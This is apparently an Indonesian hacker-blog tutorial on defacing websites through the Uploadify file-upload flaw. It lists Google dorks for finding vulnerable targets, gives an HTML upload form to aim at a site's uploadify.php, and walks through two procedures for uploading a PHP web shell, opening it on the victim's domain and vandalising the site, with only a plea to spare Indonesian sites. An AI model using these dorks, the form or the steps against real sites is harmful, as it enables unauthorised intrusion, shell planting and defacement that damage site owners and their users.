Deface metode uploadify + Up shell

Hasil gambar untuk gambar anime

Haiiii watashii smuanya!?!
Masih bersama saia,,, vvibu tamvan idaman:'v
Lamer sampah yang ingin berbagi ilmuuuu...
Kali ini watashi balik lagi dengan tutorial deface metode uploadify
Ok watashi sbenarnya tidak tahu bnyak tentang poc ini:"v
Udah prnah make blm?!? Ya tentu sudah
Sering ga?!? gak:'v,,,,,, Justru hanya sekali:'v
Metode ini sbenernya metode lama sihhh,,
Tapi masih bnyak kok yang verawann:'v
Langsung aja ya
============================================
Dork
============================================
           - inurl:/uploadify
           - inurl:/uploadify intitle:"index of"
           - inurl:/uploadify/uploads/
           - inurl:/uploadify/example/
           - inurl:/uploadify/ ext:swf
           - inurl:/uploadify/ ext:pdf
           - inurl:/jquery.uploadify
           - inurl:/jquery.uploadify ext:swf
           - inurl:/jquery.uploadify-v2
           - inurl:/uploadify intext:"uploadify.php" intitle:"index of"
           - inurl:/uploadify site:uk
           - inurl:/uploadify index of
           - inurl:/uploadify intext:".jpg"
(kembangin lagi)
=============================================
Shell, Script deface
=============================================

=============================================
Jaringan, kesabaran:'v
=============================================

Csrf:
<form method="post" action="urltarget">
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Tusbol">
</form>
===============================
===============================
Ya smacam itu lah:'v
Ingat extensi nya memakai (.html)

Nahhhh di sini saya ada 2 tutorial yang agak berbeda
Tutorial pertama memakai csrf itu dan satu lagi dengan csrf onlen:'v

========================================================================
Tutorial 1 :
1. Copy CSRF di atas lalu save dengan format .html

2. Dorking

3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank)

4. Edit CSRF yg tadi dah di save, masukan url target ke bagian action="urltarget" lalu save lg (format tetap html)

5. Buka file CSRF tadi, pilih file yang mau kalian uoload (terserah mau shell/script)

6. Jika Vuln hasilnya akan ada nama/url file kalian. Contoh /shell.php

7. Nah untuk akses shell nya, silahkan kalian copy nama/url file kalian lalu taruh di belakang alamat web target. Contoh : www.site-target.co.li/shell.php

8. Silahkan kalian acak2 website nya, tapi jika web Indonesia mohon jangan di rusak, jika ingin tebas index, backup dlu index nya
 ========================================================================
Tutorial 2:

- Harap masukan exploit:  /uploadify/uploadify.php atau /[path]/uploadify/uploadify.php
- Vulnrebilyty nya sama yakni akan tampak kosong:v
- Csrf onlen nya di Sini

Langsung aja
 1. dorking pakai dork diatas.

2. pilih target yang menurutmu vuln.

3. beri exploit pada domain website, contoh: site.com/[path]/uploadify/uploadify.php

4. jika blank putih = vuln ( bisa di eksekusi)

5. buka csrf online.

6. isi url dan post data, post data isi: Filedata

7. kunci target, upload shell.

8. kalo muncul angka 1 artinya sukses, jika blank gak sukses

9. cara akses? site.co.li/namashell.php

10. jika sudah terserah mau ngapain.
====================================================================

Sbenarnya tidak beda jauh kan?!?
Jadi yang pernah di pake tutorial yang mana?!?
Yang pertama dund,,,, Yang kedua new tutorial [source: https://www.khoirulrisqi.com]

Mungkin itu dulu yakkk!!!
Jangan lupa kunjungi share dan ikuti teruss yaa sobbb!!!

Salam lamer karatan
vvibu noleph:v
Satu karna nasib 

Komentar